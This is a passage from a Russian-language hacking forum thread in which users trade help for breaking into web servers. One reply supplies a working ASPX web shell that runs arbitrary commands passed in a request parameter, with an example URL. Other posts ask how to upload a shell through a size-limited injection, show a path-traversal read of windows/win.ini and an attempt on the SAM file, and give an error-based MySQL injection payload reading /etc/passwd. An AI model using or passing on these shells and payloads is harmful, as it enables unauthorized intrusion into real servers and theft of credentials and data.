Старый 26.01.2016, 16:09   #3511
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Думал просто, что WRITABLE_DIR\RUNCMD_EXE это автоматом даст путь к cmd.exe , видимо нет. тогда надо прописать путь?

попробовал
PHP код:
<%
Dim oShell
Set oShell 
WScript.CreateObject ("WScript.Shell")
oShell.run "cmd ping google.com" cmd 
%> 
но выдало

p.s. как возможно за 455 символов загрузить asp аплоадер, через который позже я смогу загузить мой полный asp шелл?
mikhailtpm вне форума   Ответить с цитированием
Старый 29.01.2016, 04:42   #3512
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Через boolean based нереально залить шелл? Например в sqlmap-е не дает залить, ссылаясь тем самым на технику, и правда, ведь там же по символьно работает техника. Или может все-таки есть методы? подскажите спецы)
mikhailtpm вне форума   Ответить с цитированием
Старый 29.01.2016, 10:04   #3513
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от mikhailtpm Посмотреть сообщение
Через boolean based нереально залить шелл? Например в sqlmap-е не дает залить, ссылаясь тем самым на технику, и правда, ведь там же по символьно работает техника. Или может все-таки есть методы? подскажите спецы)
Код:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%=
Process.Start(
	new ProcessStartInfo(
		"cmd","/c " + Request["c"]
	)
	{
		UseShellExecute = false,
		RedirectStandardOutput = true
	}
).StandardOutput.ReadToEnd()
%>
http://site_com/shell.aspx?cmd=dir
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Старый 29.01.2016, 14:59   #3514
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

HeartLESS,
http://pastebin.com/WYuFHe84
mikhailtpm вне форума   Ответить с цитированием
Старый 15.02.2016, 14:57   #3515
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Господа, кто может подсказать в какую сторону рыть чтобы получить доступ к серверу на OC Windows.
Имеется апач на том же сервере и уязвимый скрипт(или настройки? CWE-22) через которые я могу читать файлы
127.0.0.1/client/../../../../../../../../windows/win.ini
Пробовал читать файл SAM из config но не дает.
z0mbie вне форума   Ответить с цитированием
Старый 16.02.2016, 06:58   #3516
lix
 
Регистрация: 09.02.2016
Сообщений: 3
Репутация: 0
По умолчанию

SQLMAP выдает пустоту,пишет что найдено 45к записей и идут пустышки,как с этим бороться?
lix вне форума   Ответить с цитированием
Старый 17.02.2016, 12:15   #3517
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Заметил что при пост запросе оптравляется sql запрос в формате JSON.Помогите составить правильно.
Код:
Storage.execute([!{"select":[{"a":"id"},"id",{"a":"code"},"code"],"from":[{"a":"spr.human.sex"}]}!])
z0mbie вне форума   Ответить с цитированием
Старый 18.02.2016, 12:37   #3518
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
Заметил что при пост запросе оптравляется sql запрос в формате JSON.Помогите составить правильно.
Код:
Storage.execute([!{"select":[{"a":"id"},"id",{"a":"code"},"code"],"from":[{"a":"spr.human.sex"}]}!])
Тут и так все правильно составлено.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 07.03.2016, 13:20   #3519
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Подскажите направление.
Есть error-based SQL inj на сайте в REQUEST_URI т.е site.ru/' со всеми вытекающими отсюда ограничениями, нельзя использовать пробелы, слеши, и так далее.
Пользователь мускула - root
Работает стандартный для этого случая вектор, и даже успешно читает содержимое файлов:
http://testsite/'and(extractvalue(1,concat(0x3b,(select(load_file( '/etc/passwd'))))))and'
Вопрос, в данной ситуации реально ли технически залить файла через into outfile?
Если это возможно, подскажите направление\вектр, через который это можно осуществить.
Molofya вне форума   Ответить с цитированием
Старый 09.03.2016, 00:08   #3520
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от Molofya Посмотреть сообщение
Подскажите направление.
Есть error-based SQL inj на сайте в REQUEST_URI т.е site.ru/' со всеми вытекающими отсюда ограничениями, нельзя использовать пробелы, слеши, и так далее.
Пользователь мускула - root
Работает стандартный для этого случая вектор, и даже успешно читает содержимое файлов:
http://testsite/'and(extractvalue(1,concat(0x3b,(select(load_file( '/etc/passwd'))))))and'
Вопрос, в данной ситуации реально ли технически залить файла через into outfile?
Если это возможно, подскажите направление\вектр, через который это можно осуществить.
Вы сами себе противоречите - говорите, что слеши использовать нельзя, а в векторе чтения их приводите.

Проблемы эксплуатации SQL-инъекций в REQUEST_URI вытекают не из-за невозможности использования спецсимволов в данном параметре, а из-за их поиска при реализации его распознавания в конкретном приложении. Постарайтесь привести полный список запрещенных символов, и мы попробуем вам помочь.
__________________
На правах рекламы.

Последний раз редактировалось NameSpace; 09.03.2016 в 01:10..
NameSpace вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot